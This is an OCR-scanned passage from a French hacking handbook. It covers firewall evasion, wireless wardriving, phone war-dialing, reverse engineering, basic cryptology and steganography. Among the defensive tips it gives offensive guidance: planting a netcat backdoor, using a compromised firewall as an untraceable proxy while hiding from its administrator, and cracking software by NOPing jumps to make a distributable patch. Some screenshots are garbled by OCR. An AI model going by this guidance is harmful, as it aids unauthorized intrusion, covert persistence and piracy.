Si le systeme de filtrage de paquets bloque et ignore les paquets ICMP et UDP, vous 
pouvez utiliser un outil de scan comme nmap (en desactivant le sondeur ping ICMP 
bien sur), hping, et firewallk (qui utilise une technique proche de traceroute). 

ICMP : 

Le protocole ICMP peut nous etre d'un grand secours dans notre quete, pour cela, il 
faudrait etudier les differents codes ICMP . 



les bannieres : 

Scanner les ports du systeme de filtrage pour obtenir son nom puis faire une 
recherche sur les failles specifiques a ce systeme de filtrage de paquets. 

les ACLs (Access Control List) : 

Dans cette technique, nous allons determiner ce que le systeme de filtrage de paquets 
autorise et ce qu'il n'autorise pas et trouver un moyen de contourner le firewall. 

Nous allons devoir envoyer differents paquets (ayant une modification au niveau de 
leur TTL, et etant fragmente) vers le systeme de filtrage de paquets cible; puis fort de 
nos decouvertes, nous allons essayer de le contourner grace a 1' encapsulation de 
protocole, la fragmentation.... 

passer outre les systemes de filtrage : 

- Utiliser la technique de contournement d'ACLs. 

- Apres avoir recupere les informations sur le systeme de filtrage de paquet, il faut 
faire des recherches sur les failles de ce systeme de filtrage de paquets dans des sites 
ou des newsgroups comme celle de securityfocus.com... 
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- Pour passer au travers d'un systeme du filtrage, on peut aussi utiliser une technique 
nommee le tunneling (a l'aide de httport et htthost), que je ne detaillerais pas dans ce 
livre car elle necessite de pouvoir avoir un acces a un poste se trouvant dans le reseau. 
Pour information, le tunneling utilise une technique d' encapsulation de protocole 
dans un autre protocole. 

- Pour connaitre les systemes tournant derriere un firewall, on peut capturer les 
informations SNMP du reseau. Si on connait a quel domaine appartient le firewall ou- 
meme la cible, on peut aussi faire des requetes de type AXFR (referez-vous a la partie 
concernant le transfert de zones) . 

- Pour cartographier un reseau se trouvant derriere un systeme de filtrage de paquets, 
on peut utiliser le programme firewallk qui utilisent une technique particuliere : il est 
base sur traceroute. Puis en fonction des paquets qu'il regoit, firewallk forge des 
paquets en modifiant les TTL pour pouvoir acceder au divers systemes du reseau. 

- On peut aussi mettre en place une attaque par injection de code a distance mais cela 
depasse le cadre de ce livre et demande une connaissance de la programmation 
Windows. 



placer un backdoor : 

Apres avoir lu les deux premieres parties de ce chapitre, vous devriez etre capable 
d'identifier un systeme de filtrage de paquet, d'obtenir des informations sur les 
systemes qu'il protege. 

Disons maintenant que nous avons reussi a infiltrer le systeme de filtrage de paquets. 
Je pense que vous voudriez pouvoir revenir aisement sur le systeme (quel qu'il soit) 
conquis? et bien pour cela, on devrait y installer une porte ouverte avec le logiciel 
netcat ou un cheval de troie. . . 



astuce : 

Utilisez le systeme de filtrage de paquets et comme proxy pour le web. La, vous 
pouvez etre sur d'etre intracable. Bien sur, masquez votre activite aux yeux de le 
administrateur a qui appartient le systeme de filtrage de paquets. 

Parades : 

definissez des ACLs strictes. 

placez votre systeme de filtrage dans une DMZ (zone demilitarisee) 

utilisant une bascule de protocole. 

modifiez ou supprimez les banniere de vos ports 

faites attention a vous a SNMP 
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activez tres peu de port sur votre systeme de filtrage de paquets (le port 
80 et le port 53 suffisent generalement) 
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Piratage aerien 



les reseaux sans-fil : 

Le 802.1 1 est une technologie permettant de faire communiquer des PC entre eux ,a 
distance (sans fil et autres supports que les ondes radio et des ondes infrarouges) et a 
l'aide des cartes reseaux adaptees. Mais les techniques utilisees par ces reseaux 
dependent de la legislation en cours dans le pays (en France, la bande de frequence et 
de 2,4 GHZ pour les particuliers et les entreprises creant un reseau wifi). 

Voyons maintenant les topologie (ou structures) des reseaux 802.1 1. Pour l'instant, il 
en existe 2 : l'infrastructure et le ad hoc. 

• l'infrastructure est constitute de points d'acces qui vont jouer le role 
d'un switch/hub entre les PC sans fil et qui sont generalement 
connectes a un reseau cable. Cette architecture peut faire penser a 
une architecture client /serveur ou les serveurs peuvent etre relies 
entre eux. 

• le ad hoc est une architecture particuliere car elle est seulement 
equipes de PC ayant des cartes reseau adapte au sans-fil et etant 
auto-configurable, c'est-a-dire, que les PC dans le reseau se 
reconnaissent entre eux et s'echangent de donnees. Chaque nceuds 
du reseau devrait aussi pouvoir servir de routeur. 

Pour plus d' informations sur les reseaux sans-fil, je vous conseille de faire des 
recherches sur internet ou de vous procurer des livres sur ce sujet comme «802.1 1 et 
les reseaux sans-fil» aux editions Eyrolles. 

la securite des reseaux sans-fil : 

Cette partie est principalement orientee technique d'intrusion et securisation des 
reseaux wifi. 

Comment les pirates font-ils pour penetrer les reseaux sans-fil ? 

Et bien, ils utilisent une technique appelee wardriving (ou encore wartraining, 
warfooting, warbusing) qui consiste a parcourir des endroits et places a la recherche 
de reseaux sans-fils. 

Comme pour les reseaux cables, les informations circulent la plupart du temps non 
cryptees done l'espionnage des reseaux sans-fil devient une tache aisee car il nous 
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faut nous procurer un sniffer (comme TCPdump pour Linux et Ethereal pour 
Windows) . 

Maintenant voyons comment se pratique le wardriving. D'abord il nous faut du 
materiel adapte : 

• un ordinateur portable 

• une carte reseau adaptee et non configuree 

• un GPS 

• des antennes omni-directionnelles ou bi-directionnelles. 



Puis les logiciels adaptes : 

• un scanner de reseau sans-fil comme Netstumbler (www.netstumbler.com) 
pour Windows, Airtraft (sourceforge.net/projects/airtraf), Kismet 
(www.kismetwireless.net) et WiFiScanner 

(www.hsc.fr/ressources/outils/wifiscanner/) pour Linux. On l'activera pour 
rechercher les reseaux sans fil, 

• un sniffer, vous pouvez prendre votre habituel sniffer, 

• un cracker Wep comme Airsnort, pour cracker les paquets qui seraient 

eventuellement cryptes avec le WEP, 

• un logiciel de cartographie comme Stumverter qui envoie les differents 

elements d'un reseau sans fil. II lui faut Netstumber, Mappoint, et un GPS 
pour fonctionner. 

Vous devez vous demander a quoi peut bien servir le scan de reseaux sans fil ? 

Et bien a ecouter (sniffer) les reseau pour savoir les informations qui y circulent, a 
facilement detourner une connexion dans le but de surfer, jouer , passer des 
protections par IP. . . 

II peut y avoir plusieurs autres applications et avantages de cette technique. 
Maintenant, passons a la securisation des reseaux sans-fil. 

En premier lieu, activez le WEP qui va crypter les informations qui circulent sur votre 
reseau wifi, vous pouvez aussi utiliser d'autres utilitaires (comme SSH) qui sont 
utilises dans les reseaux cables. 

Vous pouvez-vous, si vous utilisez la topologie infrastructure, mettre en place un 
filtrage d'adresses MAC, d'adresses IP ou placer des ACL (Access Control List) . La 
meilleure solution en plus des precedentes serait d'affecter des ID au point d'acces, 
apres cette etape, on configure le reseau dans le but que seul les postes connaissant 
cet ID puisse se connecter au point d'acces associes. 

Pour plus de renseignements, procurez vous un livre sur les reseaux sans-fil qui vous 
indiquera les differents moyens qui s'offrent a vous pour la securisation de reseaux 
sans-fil. 
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Reseau telephonique commute 



Dans ce chapitre, nous allons voir certaines techniques que les pirates du telephone 
(phreakers) utilisent. Nous allons aussi essayer de voir et de comprendre les failles de 
ces systemes telephoniques, dans le but de les securiser ou de minimiser les 
possibilites d'attaque. 

D'abord, interessons-nous aux capacites des pirates du systeme telephonique puis 
donnons un exemple de piratage telephonique. 

Un phreaker experimente connaissant le fonctionnement d'un autocommutateur et 
faisant de l'electronique peut faire tout ce qu'il veut, la seule limite sera son 
imagination. 

Par contre, si on met des batons dans les roues d'un novice, il ne pourra pas terminer 
son travail et comme les novices represented la majorite de la population 
underground qui passent leurs temps a pirater des entreprises, vous pourrez vous 
occuper d'autres choses que de la securite de vos systemes telephoniques (comme les 
PABX , VMB et les porteuses qui sont des modems pour ceux qui ne seraient pas 
familiarises avec ce terme). 

Pour detourner ou pirater des systemes telephoniques, les phreakers ont la possibility 
de creer des montages electronique que Ton appelle aussi « box », il existe diverses 
box 



A but informatif, la plupart des sites warez proposent des schemas des differentes box 



Les phreakers peuvent aussi pirater des PABX (des autocommutateurs crees pour la 
gestion des appels), des VMB (les boite vocale reposant sur les PABX), ou encore des 
modems, des terminaux, des VAX, des telephones portables . . . 

Bon apres quelques notions theoriques, nous allons passer a la pratique : 

Comment les phreakers font-ils pour pirater un reseau commute ? 

Et bien comme pour tous les autres systemes, il faut d'abord rechercher des 
informations, ici, ce sont des numeros de telephone de l'entreprise cible qui nous 
interessent. 

Les recherches peuvent etre fait dans des annuaires, des whois, des publicites, les 
sites de l'entreprise . . . 
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Maintenant et il nous faut les logiciels de composition automatique de numero de 
telephone comme : 

• THC-Scan prenant l'interface du DOS 

• Toneloc de www.sandstorm.net 

• TeleSweep de www.securelogix.com 

A la difference des autres attaques decrites dans ce livre, il va nous falloir du materiel 
adapte et comme pour toutes les autres attaques, nous devons avoir les autorisations 
des possesseurs des systemes telephoniques que nous allons brievement contacter : 
car cette technique est consideree comme du piratage pur et nous avons tres peu de 
moyens de se proteger car les attaques ne peuvent se faire qu'a partir de modems done 
notre fournisseur d'acces va normalement remarquer que nous contactons plusieurs 
systemes telephoniques a la fois dans des delais courts. 

Bon passons a l'attaque proprement dite. 

II va nous falloir des modems connectes directement sur un PC pour que l'attaque 
aille plus vite, car nous allons donner une liste de numeros de telephone a l'un des 
logiciels puis ce dernier va brievement contacter chaque numero et determiner s'il 
s'agit d'une personne, d'un fax, d'une VMB, du PABX, ou dun modem. 

Lors de la decouverte d'un des trois derniers systemes telephoniques precedant, un 
bon logiciel va normalement essayer de decouvrir soit la sequence d'acces a la boite 
vocale (pour les PABX et les VMB) soit le couple login/password du modem. 

Le piratage telephonique sert generalement a telephoner gratuitement, mais aussi, lors 
d' attaques evoluees, a se proteger pour ne pas se faire prendre. 
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Piratage logiciel 
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Les logiciels, scripts et autres programmes represented les % du monde informatique. 
Leur securite est done primordial. 

La seule methode de securisation d'un logiciel que je connaisse est l'analyse pas a pas 
du code du logiciel. 

Bien sur, on ne peut pas avoir le code source de chaque programme et e'est ici 
qu'entre en jeu l'analyse du code binaire et la retro-ingenierie, qui va nous permettre 
d'analyser et tracer l'execution du logiciel cible mais aussi de pouvoir voir le code 
assembleur des logiciels en question. 

Pour realiser toute cette technique d'analyse de logiciels, il va nous falloir certains 
outils que Ton verra plus tard. Voici les principales methodes d'analyse et de 
recherche de vulnerabilite dans les logiciels. Commencons par la plus simple qui est 
l'analyse du code source. 



analyser le code source : 

Cette methode d'analyse se pratique pas a pas et sert a trouver et eradiquer les 
fonctions posant probleme comme strcpy(), strcat(), printf(), du langage C (cf 
« depassements de tampons » et « chaines de formats ») . 

Comme je le disais, cette analyse se fait pas a pas, e'est-a-dire ligne par ligne voir 
mot par mot ou instruction par instruction. 

II existe des outils qui peuvent analyser un code source a votre place mais il y a 
toujours une marge d' erreur car aucun outil ne peut supplanter la capacite d'analyse 
d'un homme. 

Voici certains de ces outils : 

• RATS (sur www.securesw.com) qui analyse les codes sources en C, C++, 

Python, Perl, PHP et renvoie les eventuelles failles qui peuvent s'y trouver 

• Flawfinder de David Wheeler 

• Hailstorm (sur www.clicktosecure.com) qui recherche les bugs 

• Le celebre Retina (www.eeye.com) qui offire des possibilites de faire des 
recherches dans le code source. 

Si vous ne pouvez pas vous procurer les codes sources des programmes, vous pouvez 
soit pratiquer la retro ingenierie (que nous allons expliquer dans la suite de ce 
chapitre) soit rechercher des informations sur le logiciel comme des aides et d'autres 
documents techniques comme les conseils du developpeur... 
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Une autre methode d'analyse consiste a comparer les fichiers, des bout de codes. 



la comparaison (diffing) : 

La comparaison consiste a detecter la difference entre 2 supports d'ecriture : les 
fichiers, les programmes (sous la forme de code source) mais aussi des bandes, 
disques et plein d'autres supports. 

Nous n'allons pas nous attarder sur la theorie du diffing car son but est la 
comparaison des deux elements, passons directement a la pratique qui est plutot 
simple mais peut-etre d'un grand secours aussi bien pour les pirates (scenario 1) que 
pour les analyseurs de codes sources (scenario 2). 

Je vais vous donner des scenarios d'utilisation de la comparaison. Pour savoir a 
quelles situations elles correspondent, remontez de quelques lignes. 



Scenario 1 : 

Le pirate a penetre un systeme important mais son but etait de decouvrir le mot de 
passe d'un programme d' administration comme VNC. 

L'administrateur a penser a effacer les informations pouvant porter atteinte a 
l'integrite de son reseau. Le pirate se retrouvent done en face d'un probleme, il ne 
peut lancer d'attaques de cracking de mots de passe sur chaque systeme client sinon il 
pourrait eveiller des soupcons, il a aussi fouille de fond en comble le systeme et ne 
trouve pas les fichiers de connexion de VNC ( disons que le administrateur les 
conserve sur une disquette et les deplace dans le repertoire de VNC a chaque fois qu'il 
veut se connecter sur un systeme ). 

Le pirate ne peut installer un sniffer car il se doute que le administrateur a du installer 
un programme detectant les sniffers ou les cartes reseau en mode promiscuite (comme 
Anti-sniff du Lopht) . 

Le pirate a done decide de travailler avec la memoire du systeme. 

II va creer un module ou un programme qui va se charger en memoire lors du 
chargement du logiciel VNC et qui s'occupera de faire des copies de la memoire 
pendant que le programme d'administration est en marche. 

II aura a la fin une serie de copies de la memoire et va chercher les differences entre 
elles dans le but d'obtenir les mots de passe. 

II peut pour s' aider creer un algorithme de tri des fichiers qui va selectionner deux 
fichiers a chaque boucle et les comparer. . . 



Scenario 2 : 
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Un autre passionne de securite et de programmation vient de telecharger la mise a 
jour d'un logiciel mais se demande ce que le developpeur a vraiment patche. 

II decide alors d'installer la version patchee sur son premier ordinateur et la version 
non patchee sur son deuxieme ordinateur ( cela peut aussi marcher avec des 
partitions ) . II se place alors aux commandes de ses ordinateurs, disassemble les 
programmes et compare les codes sources obtenus. 

II va alors avoir (en langage assembleur bien sur car les programmes ont ete 
disassembles) les differences qu'il va attentivement analyser. 



Pour faire des comparaisons, vous pouvez soit utiliser les commandes fournis par les 
systemes d'exploitation, soit utiliser certaines fonctions de comparaison des editeurs 
hexadecimaux. 

les commandes : 

• Windows nous fournit la commande fc pour la comparaison des fichiers, elle 
se trouve dans le repertoire C:\Windows\Command et est accessible par 1' 
invite de commandes Dos. 

Ces options sont : 

FC [/A] [/C] [/L] [/LBn] [/N] [/T] [/U] [/W] [/nnnn] 
[lect 1 : ] [chemin 1 Jfichier 1 

[Iect2:][chemin2]fichier2 

FC /B [lectl:][cheminl]fichierl [Iect2:][chemin2]fichier2 

/A Affiche la lere et derniere ligne de chaque ensemble de 
differences. 

/B Effectue une comparaison binaire. 
/C Ignore la casse. 

/L Compare les fichiers en tant que texte ASCII. 

/LBn Definit le nombre maximal de differences consecutives comme 

egal 

au nombre de lignes specifie. 

/N Affiche les numeros de ligne pour une comparaison ASCII. 

IT Ne convertit pas les tabulations en espaces. 

/U Compare les fichiers en tant que fichiers texte UNICODE. 

/W Comprime les blancs (tabulations et espaces) pour la 

comparaison. 

/nnnn Specifie le nombre de lignes consecutives qui doivent 

correspondre 

apres une difference. 
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• Unix, quant a lui, nous fournit la commande « diff » qui sert a comparer des 
fichiers textes. 



Voici un exemple de la commande fc sous Windows : 

J'ai place dans un repertoire (« c:\exemple\ »), 2 listes de mots chinois (leurs 
phonetiques en fait) qui ont quelques differences. Pour mettre en evidence leurs 
differences, nous allons utiliser la commande fc. 

Premierement, nous allons utiliser la commande dir sur le repertoire ou se trouvent les 
fichiers pour etre sur qu'ils ne sont pas semblables. 



Microsoft Windows 2000 CUersion 5.00.2195] 
<C> Copyright 1985-1999 Microsoft Corp. 

C:\>dir c:\exempleN 
Le uolune dans le lecteur C n'a pas de nom. 
Le numero de serie du volume est 44B5-0431 

Repertoire de c:\exemple 



02/09/2003 
02/09/2003 
02/09/2003 
02/09/2003 



21 
21 
21 
21 



<DIR> 
<DIR> 



16 
16 
15 
15 

2 fichier<s> 



2 470 dicol.txt 
2 516 dico2.txt 

4 986 octets 



2 Rep<s> 4 550 369 280 octets libres 



:\>. 



Nous avons maintenant l'assurance que la liste de mots chinois a ete modifiee. 
Voici ce qui les differencient : 
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C:\>fc c:\exemple\dicol.txt c:\exeniple\dico2.txt 

Comparaison des fichiers C:\EXEMPLE\dicol.txt et C:\EXEMPLE\DIC02.TXT 
***** C:\EXEMPLE\dicol.txt 



Jnjxj 

B 

L 



***** C:\EXEMPLE\DIC02.TXT 



Nous voyons clairement que dans la liste 2 (qui est en fait une mise a jour) les mots 
nai, nan, niao, nie, nin, ning, niu, no, nou ont ete ajoute. 



Pour connaitre leur signification, consultez un ouvrage de conversion francais- 
chinois. 



les editeurs hexadecimaux : 

Les editeurs hexadecimaux que nous allons presenter ont des fonctions de 
comparaison de fielders. 



diverses techniques : 

II existe pleins d'autre techniques de comparaison des fichiers dont je n'ai pas parle 
comme la somme de controle et des commandes permettant de decouvrir les derniers 
fichiers manipules mais cela n'entrent pas dans le sujet du chapitre. 



le reverse enginneering 

Le reverse enginneering est une technique qui consiste a analyser un programme sous 
la forme d'executable et dont on a pas le code source. Le reverse enginneering peut 
aussi bien servir a patcher un programme dont l'utilisation est limitee dans le temps 
ou dans le nombre d'essais, il peut aussi servir a securiser un logiciel ou a obtenir son 
listing en assembleur dans le but de le modifier un peu ou de 1' adapter a un 
environnement special. 

II existe 2 manieres d' analyser un programme :le Dead Listing ou le Live Approach. 
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Le Dead Listing consiste a disassembler le programme pour obtenir son listing (code 
source) en assembleur puis analyser ce dernier. Alors que le Live Approach consiste a 
tracer l'execution du programme en mettant en place des points d' arrets (bpx, 
bpm...) 

Maintenant, voyons les programmes utilises pour faire du reverse enginneering. 

En premier, il faut un : 

desassembleur qui va de-compiler le programme pour nous donner le 
listing de l'executable, 

un debogueur qui va permettre de tracer l'execution d'un programme, 

- un editeur hexadecimal; comme son nom l'indique, il va nous permettre 
d'acceder au fichier binaire de l'executable, 

un editeur de fichiers PE qui va nous permettre d' obtenir quelques petites 
informations sur l'executable, 

un logiciel nous permettant de connaitre les processus en memoire 
(comme Procdump), 

il faudrait aussi un livre sur le langage assembleur, sur les symboles 
,utilises par Windows et sur ses fonctions systeme, 

- un loader. 

Voici quelques logiciels et outils importants : 

- desassembleurs : • Windasm 

Disassembler Project Debug Search Goto Execute Text Functions Hen Data Ref s Help 

£?\ -\ ■ I I I I I I I I i 1 I I 1 I I I lal 




[Pre-Processing File: T si >_ sue - Addc: 00DD389A 



Les editeurs hexadecimaux : • UltraEdit 
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Cy> UltraEdit-32 - [C:\Program Files \Dactylo\Jfc^l.»ie] 



I J File Edit Search Project View Format Column Macro Advanced Window Help 
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editeurs de fichiers PE : • PE Explorer 
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H PE Explorer - C:\Program Files\ 



File View look Help 
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For Help, press F1 



Patcher : • Data Crack Engine 



F" C:\DOCUME~ 1 \ADMINI~ 1 \LOCALS~ 1 \Temp\Rar$EX03.640 



Data Crack Engine 3.10 



Syntaxe : DCE Fichier_Cracke Fichier_Original Fichier_Crack_EXE 

DCE /M -> Patches multiples 
Fichier Crack. .CRRCK.EXE : _ 




• CodeFusion 
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^CodeFusion Wizard Version 3.0 [UNTITLED. CFP] 


-|n|x| 


jSj Wizard 











iin Window Icon 



Load Icon... 



4t Default icon 



Edit About Dialog. . . 







Next > 




Cancel 







- l'assembleur : il nous faut un livre sur l'assembleur et expliquant aussi 
['architecture des processeurs et de la memoire, 

- les fonctions Windows, 

- les symboles Windows, 

- les attributs des sections des en-tetes des executables. 

Apres cette masse de theories, un peu de pratique. Nous allons voir comment sont 
creer les patchs (aussi bien pour deplomber les logiciels que pour les securiser un peu 
plus) puis il y aura quelques techniques permettant de contrer la decompilation et les 
techniques de cracking associees. 

creer des patchs : 

Definition : 

- un patch est une rustine logiciel qui va modifier un/des octets a des offsets 
bien precis dans le but de modifier le comportement du programme quand 
il est soumis a certaines actions. 

un key gen est un petit logiciel qui detient l'algorithme de formation des 
cles d'activation des logiciels commerciaux. 

- Un offset est une adresse. L'adresse d'un octet (8 bits) se trouvant dans un 
programme. Generalement cet octet renvoie a la valeur hexadecimale 
dune instruction du programme. Comme nous venons de le voir, l'offset 
renvoie a une adresse precise, done comment faire pour acceder aux 




Patch Window Caption: 



M 



Patch Title/Program Name: 



Information/Comments : 



_ ^__jjy 

^ Set as Default Text Restore Default Text 



please enter the following project/patch information. 
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autres octets de l'instruction cible? II suffit d'incrementer d'une unite et 
ainsi de suite l'offset de base. 



Maintenant, voyons comment patcher un programme. 

La maniere la plus simple d'expliquer le reverse engineering serait d'expliquer 
comment deplomber des utilitaires ou des programmes dont l'utilisation est limitee (je 
parle bien sur de challenges nommes « Crackme » et pas des logiciels 
commerciaux !!!) car expliquer comment creer des patchs de securite serait 
impossible a faire car il existe une trop grande variete de patchs (comme il existe une 
trop grande variete de vulnerabilites dans les logiciels). 

La technique la plus utilisee pour regler la duree de vie d'un programme ou pour tout 
autre type de bridage et de protection est ce que Ton appelle les sauts conditionnels. 
En assembleur, les sauts conditionnels sont les instructions du type jxx qui servent a 
comparer des elements ; si le test est valide alors on saute a l'adresse, au label (...) 
fourni en argument. 

Lorsque Ton trouve le saut conditionnel posant « probleme » (dans le code source), il 
suffit de remplacer l'hexadecimal du saut conditionnel par l'hexadecimal de 
l'instruction NOP. 



Pour information, NOP a comme valeur hexadecimal : 90. . . 



Pour annuler un saut conditionnelle, il existe une deuxieme solution qui consiste a la 
changer par une instruction faisant l'inverse de l'instruction utilisee dans le 
programme. En utilisant toujours les correspondances hexadecimale. 

II nous reste plus qu'a creer le patch servant a modifier d'autre programme semblable 
et que Ton diffusera. 

Pour faire cela, on peut soit programmer une petite rustine en langage C ou en 
langage assembleur qui ira a l'offset du saut conditionnel, modifiera les valeurs de 
l'octet par des valeurs fournis. On peut aussi utiliser des logiciels qui vont analyser le 
logiciel d'origine avec le logiciel craque et qui vont produire le patch. 

Pour clore le chapitre, nous allons voir certaines techniques de protection contre le 
reverse enginnering. 

la modification des attributs des sections de l'executable : 

Pour derouter certains crackers (reversers), on peut modifier manuellement ou a l'aide 
de PE crypteurs les caracteristiques des sections de l'executable. Cela peut aussi 
permettre de crypter le code de l'application, en placant le point d'entree du 
programme (entry point) vers une section qui detient une routine de dechiffrement du 
code... 
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le polymorphisme : 

Le polymorphisme qui consiste a modifier l'aspect du code peut aussi etre utilise pour 
rendre illisible le code pour un eventuel cracker. Cela peut passer par la creation d'une 
routine de chiffrement et de dechiffrement du code de l'executable. 



les codes anti-debugging : 

Voici certaines astuces protegeant un logiciel du debogage ou de la de-compilation : 
la l ere methode, consiste a rechercher la presence d'un deboggeur ou d'un 
desassembleur en memoire ou sur le systeme. 
La 2 eme methode consiste a analyser ce qu'utilise les commandes des 
deboggeurs 

Exemples : la commande bpx utilise l'interruption 3h, pour contrer cette 
commande, il va falloir aller detourner l'interruption pour qu'a chaque fois 
qu'elle est utilisee un code que Ton aura cree soit execute. 



Parades : 

II n'y a pas de parade proprement dite contre l'analyse les programmes a l'aide de la 
retro ingenierie. Car cela peut aller du cryptage du programme a l'aide PE encrypteurs 
a l'utilisation de code anti-debbugging. 
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Cryptologie 
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Les procedes cryptographiques existent depuis deja des centaines d'annees. La 
premiere occurrence remonte a Jules Cesar qui, d'apres ce que Ton dit, utilisait le 
chiffrement par decalage. Le vrai essor de la cryptographie (la science ou Ton etudie 
les procedes cryptographique mais aussi leur creation et leur securite vis-a-vis 
d'environnements specifiques) debute aux deux guerres mondiales quand de grands 
mathematiciens mirent en oeuvre leurs connaissances pour produire des algorithmes 
servant a chiffrer des messages. 



les bases de la cryptographie : 

Qu'est-ce qu'un algorythme cryptographique ? 

C'est une suite logique de formules mathematiques qui servent a pouvoir chiffrer un 
texte clair puis pouvoir dechiffrer le texte chiffre a l'aide de ce que Ton appelle des 
cles. 

Pour ceux qui prefere les formules mathematiques : soit CHcl( ) : l'operation de 
chiffrement a l'aide de la cle (notee « cl »), DEcl( ) : l'operation de dechiffrements a 
l'aide de la cle, xt : le texte clair et yt : le texte clair ayant ete chiffre : 

- CHcl (xt) = yt 

- DEcl (yt) = xt 

- DEcl (CHcl (xt) ) = xt 



le chiffrement par decalage : 

Dans ce chiffrement, le but va etre d'aj outer « + cl » aux correspondances 
numeriques des lettres du texte clair en n'oubliant pas les modulos: (mod 26). 



Ici cl est un chiffre que l'emetteur choisi ou non avec le destinataire. 



Le dechiffrement va consister a faire l'operation inverse : done une soustraction puis 
le modulo. 

Mathematiquement, cela revient a faire : 

- CHcl (xt) = xt + cl mod 26 

- DEcl(yt) = yt - cl mod 26 



Ici, xt etyt correspondent a chaque caractere des textes clairs et chiffres dont la 
representation numerique s'etend de 0 a 25 soit [ 0, . . . m-1 ] pour etre plus generale. 
( m represente le nombre de caracteres de l'alphabet dans lequel on fait la conversion 
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le chiffrement affine : 

Le chiffrement affine et le chiffrement par decalage ont la meme souche, le meme 
base : la substitution. 

Pour le comprendre leurs similitudes, analysons les fonctions de cryptage et 
decryptage du chiffrement affine. 

Soit xt un caractere du texte clair et yt un caractere du texte chiffre : 

- CHcl (xt) = a.xt + b mod 26 

- DEcl(yt) = 1/a (yt - b) mod 26 

Avant de terminer cette partie sur le chiffrement affine, nous allons voir la maniere 
dont on calcul le nombre de cles possibles pour crypter un message avec ce 
chiffrement. Tout depend de m car, dans un premier temps, il va nous falloir calculer 
les valeurs possibles de a lorsque le pgcd (a, m) = 1 (aidez vous du theoreme de 
Bezout) . II ne faut retenir que les valeurs de a comprise entre [0, ... m-1 ]. Ensuite il 
va falloir compter le nombre de valeurs retenues. Pour finir, il faut multiplier le 
resultat precedent par m. Le produit est le nombre de cles possibles. 



Generalement m = 26 ( les 26 lettres de l'alphabet ). 



chiffrement par substitution : 

Malgre le nom de ce chiffrement qui ferait penser a proceder cryptographique 
complexe, le chiffrement par substitution consiste en la creation d'une suite 
alphabetique choisi avec le destinataire (et n'etant pas dans l'ordre conventionnel : A, 
B, C, X,Y,Z) . Ensuite il va falloir superposer cette suite sur l'alphabet normal 
(dans l'ordre conventionnel) et faire les transformations. 

chiffrement par permutation : 

Contrairement au chiffrement par substitution, on va seulement couper le message a 
transmettre ( xt) en bloc de lettres de meme taille et inter-changer leur place grace a 
des regies prealablement etablient 

chiffrement en chaine : 

Dans les chiffrements classiques, on utilise une cle statique pour chiffrer et dechiffrer 
chaque caractere des textes. Dans un chiffrement en chaine, la cle change a chaque 
caractere car il y a eu une generation d'un nombre de cles egale au nombre de 
caracteres dans le message. Mathematiquement, cela se traduit par 

CHcl (xt) = yt 
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et 

DEcl (yt) = xt 

pour les chiffrements par blocs et par 

CHk(xt) = yt 

et 

DEk(yt) = xt 

pour les chiffrements en chaine; soit k une cle changeant a chaque caractere done a 
chaque utilisation de la cle. 

II existe 2 types de chiffres en chaine : le chiffrement synchrone et le chiffrement 
asynchrone. 

Pour plus d'informations sur les differents types de chiffrement et sur la cryptographie 
en general, referez-vous a des livres traitant de ce sujet. Car cela depasse le cadre de 
ce livre. 



Cryptanalyse 

La cryptanalyse est un domaine de la cryptologie ou Ton essaie de trouver une faille 
dans un systeme cryptographique dans le but de decouvrir la cle utilisee ou de lire le 
texte clair. La cryptanalyse est aussi utilisee pour verifier la surete d'un algorithme 
cryptographique. 

La cryptanalyse d'un algorithme cryptographique peut debuter a partir de n'importe 

quel support, les plus connus sont : 

a texte chiffre connu: ou il va falloir analyser le texte dans le but de 
decouvrir sa correspondance en clair a l'aide de techniques de 
cryptanalyse que nous allons voir, 

a texte clair et chiffree connu: ou Ton va essayer a l'aide des 2 textes de 
decouvrir la cle et l'algorithme, 

a texte clair et un acces direct ou indirect a 1' algorithme: dans le but de 
comprendre le fonctionnement de 1' algorithme, 
a texte chiffre choisi et un acces direct ou indirect a l'algorithme: pour 
pouvoir comprendre le fonctionnement de l'algorithme. 

Maintenant, nous allons voir deux techniques de cryptanalyse : 

l'analyse des frequences : il va falloir compter le nombre d'apparitions de 
chaque lettre de l'alphabet dans le(s) texte(s) chiffre(s) et les comparer 
avec les probabilites d'apparition de chaque lettre de la langue du texte 
clair en se basant sur des tableaux de frequences. 
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l'analyse differentielle : elle ne peut etre pratiquee qu'en possession ou en 
ayant un acces directe ou indirecte a l'algorithme cryptographique, il va 
falloir choisir un texte clair comprenant, au mieux, toutes les lettres de 
l'alphabet et voir apres passage dans l'algorithme sa correspondance en 
crypte. 

Les algorithmes cryptographiques 

II existe plusieurs algorithmes de cryptographic (comme le DES, le AES et le 
3DES. . .) qui sont divises en 2 families. 

les algorithmes de cryptographic symetriques (ACS) : 

Ce sont des algorithmes qui vont utiliser la meme cle pour chiffrer et dechiffrer le 
message voulant etre crypte. 

les algorithmes de cryptographic asymetriques (ACA) : 

Contrairement aux ACS, le ACA vont utiliser 2 cles differentes: une pour chiffrer, 
1' autre pour dechiffrer. 

La cle de chiffrement est appelee cle publique et sert a crypter les messages. La cle de 
dechiffrement est appelee cle privee et sert a dechiffrer les messages cryptes avec la 
cle publique. 

Ces 2 cles sont mathematiquement liees. C'est pour cela qu'on ne peut dechiffrer un 
message ayant ete chiffre avec une cle publique n'appartenant pas a la personne a qui 
Ton envoie le message. 

La steganographie 

La steganographie est un domaine de la cryptographic ou l'on va cacher les donnees a 
transmettre a une/des personne(s) dans des fichiers qui paraissent anodins (comme les 
images...) 

Pour ecrire des messages dans une image, il va falloir un editeur hexadecimal et 
l'image choisie. Ouvrez l'image avec l'editeur hexadecimal, recherchez les zones de 
padding (une suite de chiffres 0 dans la zone hexadecimale) et remplacez-les par le 
message voulu (cela peut parfois degrader l'image). 

Cela peut aussi marcher avec des executables (qui contiennent de tres grandes suites 
de 0). 
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Pour apporter un peu plus de securite a nos messages caches, vous pouvez crypter ces 
derniers avant de les cacher. 

Vous pouvez maintenant envoy er des messages caches (et cryptes). 

Pour pouvoir retrouver le message, votre destinataire va devoir ouvrir 1' image (ou 
autre), avec un editeur hexadecimal, se rendre a l'offset ou vous avez place le 
message et lire ce dernier. 

Maintenant, vous pouvez envoyer des messages caches, les mettre sur des sites (par 
exemple comme arriere-plan d'une page pour que votre/vos destinataire(s) puissent y 
acceder). De plus cette methode est pratiquement indetectable car tres peu de 
personnes s'amusent a ouvrir avec un editeur hexadecimal, une image qu'ils trouvent: 
surtout quand ce sont des images utilisees comme arriere-plan de pages web. 
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Partie III : 
Programmation reseau 
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Dans cette partie du livre, nous allons voir les bases de la programmation reseau. 

En premier, il y aura un aide-memoire du language C qui survolera les notions les 
